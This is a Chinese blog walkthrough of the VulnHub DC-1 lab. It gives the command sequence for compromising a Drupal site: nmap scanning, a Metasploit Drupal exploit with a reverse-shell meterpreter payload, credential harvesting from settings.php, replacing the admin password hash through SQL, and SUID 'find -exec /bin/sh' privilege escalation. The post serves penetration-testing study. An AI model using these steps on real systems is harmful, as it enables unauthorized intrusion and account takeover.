vulnhub-dc1靶场

最新推荐文章于 2024-05-29 21:26:51 发布
最新推荐文章于 2024-05-29 21:26:51 发布
阅读量952 收藏 21
点赞数 29
分类专栏: vulnhub 内网安全 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longwanlian/article/details/134694537
版权

DC1

配置环境vmware17 + nat网络配置

下载地址:DC and Five86 Series Challenges - DC-1

攻击机kali与其在同一网段下 ip:192.168.31.131

信息收集

arp-scan -l #内网探测,扫描目标ip

image-20231128213648254

发现目标ip192.168.31.135

使用nmap对目标进行扫描

nmap -T4 -sV -O -A -P 192.168.31.135

image-20231128214040148

发现开放端口80,22,111

先访问80的http服务

image-20231128214143785

发现了Drupal系统

漏洞利用

寻找历史漏洞

image-20231128214246111

使用msf查看有没有此漏洞的exp利用

msfconsole
search Drupal

image-20231128214359405

选择第二个,远程命令执行

use 1

image-20231128214543280

设置目标ip以及payload

set RHOST 192.168.31.135
set payload php/meterpreter/reverse_tcp #上图中默认的payload =>defaulting to php/meterpreter/reverse_tcp

开始利用

exploit

等待一下

image-20231128214842816

使用shell,然后利用python 创建交互式shell

shell
python -c 'import pty;pty.spawn("/bin/bash");'

image-20231128215005647

内网信息收集

查看信息

image-20231128215113789

image-20231128215533209

翻译过来,就是让你去找配置文件

这里采用find命令

find ./ -type f -name "*config*" -o -name "*setting*"#从此目录下递归查找文件名带有config或者setting的文件

image-20231129161547417

经查找在 ./sites/default/settings.php 有东西

cat ./sites/default/settings.php

image-20231129161725925

修改数据库密码

数据库账号密码

进入数据库

mysql -udbuser -pR0ck3t

查看数据

show databases;

image-20231129162100282

切换数据库

use drupaldb;

查看表

show tables;

image-20231129162315358

select * from users;

image-20231129162429016

在这里可以发现密码做了加密处理,所以必然有加密函数,可以通过加密一段密码替换原有的密码从而使用管理员身份登录

find ./ -type f -name "*password*"

image-20231129162656851

置换密码

update users set pass = "$S$DM/Wwb8I3NnMzCf4bGsGzoNV0tUQzvxJKTCN3E4mE2CQoODuQdtL" where uid = 1;

image-20231129163106371

登录网页

admin 123456

image-20231129163220671

image-20231129163311309

image-20231129163353869

翻译为,特殊的PERMS 将帮助查找passwd——但是您需要-exec 该命令来确定如何获取shadow中的内容。

权限提升

再使用find命令尝试提权

find / -perm -u=s -type f  #从根目录找具有root权限的文件

image-20231129164018713

发现find命令存在root权限,利用findml进行提权

find ./ 存在的文件名 -exec  "/bin/sh" \;

image-20231129164506185

成功提权

找flag

find / -type f -name "*flag*"

image-20231129164749788

总结

  1. nmap信息收集,wappalyzer插件找cms

    nmap -T4 -sV -O -A -P ip //T4速度 -sV查看服务 -O操作系统 -p端口 	     将所有主机视为在在线,跳过主机发现

  2. 漏洞利用Drupal

    msfconsole
msf6>search Drupal
msf6>use 1
msf6>set RHOST 目标ip
msf6>set payload 默认payload
meterpreter>shell
python -c 'import pty;pty.spawn("/bin/bash");' 使用python创建一个交互式shell

  3. find命令进行信息收集

  4. 数据库改密码

    update 表名 set 字段 = "修改的值" where 对应其他字段 = "当前存在的值"

ayload 默认payload
meterpreter>shell
python -c ‘import pty;pty.spawn(“/bin/bash”);’ 使用python创建一个交互式shell




3. find命令进行信息收集

4. 数据库改密码

```mysql
update 表名 set 字段 = "修改的值" where 对应其他字段 = "当前存在的值"
  1. 权限提升suid提权
longersking
关注
  • 29
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
Romax学习资料-DC1模块-载荷谱处理
03-14
Romax学习资料-DC1模块_载荷谱处理
VulnHub----DC1靶场记录
x1871329637的博客
04-26 3128
00-环境介绍 靶机下载地址:DC: 1 ~ VulnHub 攻击机:kali2022:192.168.200.129 DC1:192.168.200.135 目标:拿到5个flag 1由于这是一次黑盒测试所以只能根据目标mac地址来确认靶机的ip信息 由此判定靶机ip为192.168.200.135 2nmap直接扫 nmap -A 192.168.200.135 -p 1-65535 由此可见开放了22 80 111 42892端口,可以先去访问一下80端口 .
Vulnhub系列之DC1靶场详解
weixin_54960572的博客
08-09 259
提示-exec,linux中的 exec命令,-exec 后面跟的是linux的 command 命令,exec命令以分号结束;目录是用于存储用户密码信息的文件目录,也被称为“影子文件”。该目录只有root用户拥有读权限,其他用户不能直接查看或修改该目录下的文件。因此,这个命令的作用是在Linux系统的根目录下找到所有文件,并以管理员权限在每个文件上执行Bash shell。若不指定,则修改表中所有的行。尝试验证后发现编号为1的exp可以利用,选择进入。提示shadow,在Linux系统中
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2424
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
vulnhub--DC1
baiyexing8的博客
10-14 1005
发现用户密码被hash加密了,百度查找后了解到Drupal的加密脚本在根目录的scripts中,可以生成一个密码来重置管理员密码。根据flag1的提示百度,得到Drupal的数据库配置文件在sites/default/settings.php。suid的作用:用于执行文件,以文件的拥有者的身份运行该文件。打开发现flag4在home目录中,进入/home/flag4目录中找到flag4.txt文件。拿到meterpreter以后查看当前目录,发现flag1.txt,cat得到flag1。
看完这篇 教你玩转渗透测试靶机vulnhub——DC1
Aluxian_的博客
03-22 7270
Vulnhub靶机DC1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/dc-1,292/ Vulnhub靶机安装: 下载好了把安装包
vulnhub靶场】-dc1
weixin_43446292的博客
04-13 325
1、环境配置: kali:88.16.153.33 dc1:88.16.153.36 补充:kali需设为桥接模式,因为dc靶机打开需要登录,kali设为桥接模式后与dc1在同一个局域网内,可以在kali中扫描得知dc1的ip地址;dc1的下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 需要找到5个flag.txt 2、信息收集: 2.1 使用arp-scan -l,探测存活主机,也可使用nmap 88.16.153.33/24(较慢) 2.使用nmap查询开
vulnhub靶机DC1
weixin_52450702的博客
10-29 878
靶机DC1IP:192.168.70.160。
VulnHubdc1靶场(3)
p_utao的博客
02-20 199
靶场信息: 地址:https://www.vulnhub.com/entry/dc-1-1,292/ 难度:简单 目标:有五个标志,但是最终目标是在根目录的主目录中找到并读取该标志 运行:vm work 信息收集 nmap直接扫描网段存活主机 扫描常见端口 nmap 10.7.10.29 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-19 04:14 EST Nmap scan report for 10.7.10.29 Host is u
DC靶场系列--DC1
BGiscool的博客
06-28 4565
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
docker-compose version 1.23.0,build c8524dc1
09-01
centos7安装docker后,并没有安装docker-compose,而且很多源里没有,无法通过yum安装,wget github的源码,有时候会很慢,这里提供一个现成的,源码编译好的docker-compose。centos7安装docker和docker-compose,...
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
ST_DC1-configs:DC1子卡的Machinekit配置文件(对于DE10-Nano)
02-21
ST_DC1-配置 DC1子卡的机器套件配置文件(对于DE10-Nano) 用于ShadeTechnik DC1子卡的DE10-Nano硬件测试和设置的Machinekit Hal和GUI文件。 仍在进行中,可能会进行修订。
黑龙江等保测评:强化网络安全的北方防线
2301_79527080的博客
05-28 418
二、黑龙江等保测评的实践探索1. 法规政策引领:黑龙江省积极响应国家网络安全法律法规要求,出台了一系列地方性政策文件,明确了等保测评的实施标准和要求,为全省范围内的等保工作提供了法律依据和指导。2. 强化合规意识:等保测评的实施增强了组织和个人的网络安全合规意识,推动了网络安全法律法规的落实,形成了良好的网络安全文化氛围。3. 促进产业发展:等保测评需求带动了网络安全服务市场的繁荣,促进了本土网络安全企业的成长,同时也吸引了国内外先进技术和服务的引进,为黑龙江乃至东北地区的数字经济转型提供了安全保障。
2024年中国金融行业网络安全案例集
2301_76786857的博客
05-27 300
随着科技的飞速发展,金融行业与信息技术的融合日益加深,网络安全已成为金融行业发展的生命线。金融行业作为国家经济的核心支柱,正在面临着日益复杂严峻的网络安全挑战。因此,深入研究和探讨金融行业的网络安全问题,不仅关乎金融行业的稳健运行,更关系到国家经济的安全和社会的稳定。
“区块链技术在网络安全领域的革新应用与挑战“
2403_84237550的博客
05-29 506
区块链技术,以其去中心化、不可篡改和透明度高的特性,在网络安全领域展现出了巨大的革新潜力,同时也带来了一系列新的挑战。以下是区块链技术在网络安全领域的应用及其面临的主要挑战的深入分析。2. 身份认证与管理:利用区块链建立去中心化的身份认证系统,用户可以控制自己的数字身份,减少身份盗窃和欺诈的风险,提高身份验证的安全性和效率。2. 隐私保护:虽然区块链增强了数据的完整性,但公开的区块链设计可能暴露用户的部分交易信息,需要更先进的加密技术和匿名机制来加强隐私保护。
2022年全国职业院校技能大赛高职组“信息安全管理与评估”赛项第三阶段任务书
最新发布
Geek极安云科-致力于网络安全事业
05-29 340
请获取FTP服务器上对应的应用程序,连接Pwn1服务器的10000端口,对服务器进行漏洞利用,找出其中隐藏的flag,并将flag提交。请获取FTP服务器上对应的应用程序,连接Pwn2服务器的10001端口,对服务器进行漏洞利用,找出其中隐藏的flag,并将flag提交。flag格式 flag{}(30分)请获取FTP服务器上对应的文件进行分析,找出其中隐藏的flag,并将flag提交。图1 网络拓扑结构图。通过找到正确的flag值来获取得分,它的格式如下所示:flag{}
python实现ECC算法编写以下题目:参数选取p=11,椭圆曲线为y^2=x^3+v+6,Ep(1,6)的一个生成元为G=(2,7)私钥d=7,用户A的公钥P=dG=(7,2)明文M=(9,1),加密:明文M=(9,1),用户B随机选取数k=6,由c1=kG,c2=M+k*PA得到密文为c3,解密:c2-dc1=(9,1)给出完整代码和结果
06-03
代码如下: ```python p = 11 v = 6 a = 1 b = 6 d = 7 k = 6 G = (2, 7) M = (9, 1) # 椭圆曲线上的加法 def add(a, b): lam = ((b[1]-a[1]) * pow(b[0]-a[0], p-2, p)) % p x = (lam**2 - a[0] - b[0]) % p y = (lam * (a[0] - x) - a[1]) % p return (x, y) # 椭圆曲线上的倍乘 def multiply(n, P): Q = P R = (0, 0) while n > 0: if n % 2 == 1: R = add(R, Q) Q = add(Q, Q) n = n // 2 return R # 加密 c1 = multiply(k, G) c2 = add(M, multiply(k, multiply(d, G))) c3 = (c1, c2) # 解密 d_c1 = multiply(d, c1) plain = add(c2, (-d_c1[0], -d_c1[1])) print("密文:", c3) print("明文:", plain) ``` 运行结果: ``` 密文: ((7, 9), (6, 3)) 明文: (9, 1) ``` 注:此代码仅供参考,实际应用中还需要进行一些安全性考虑,如选择更大的素数 p 和更复杂的椭圆曲线,以及避免使用固定的私钥等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值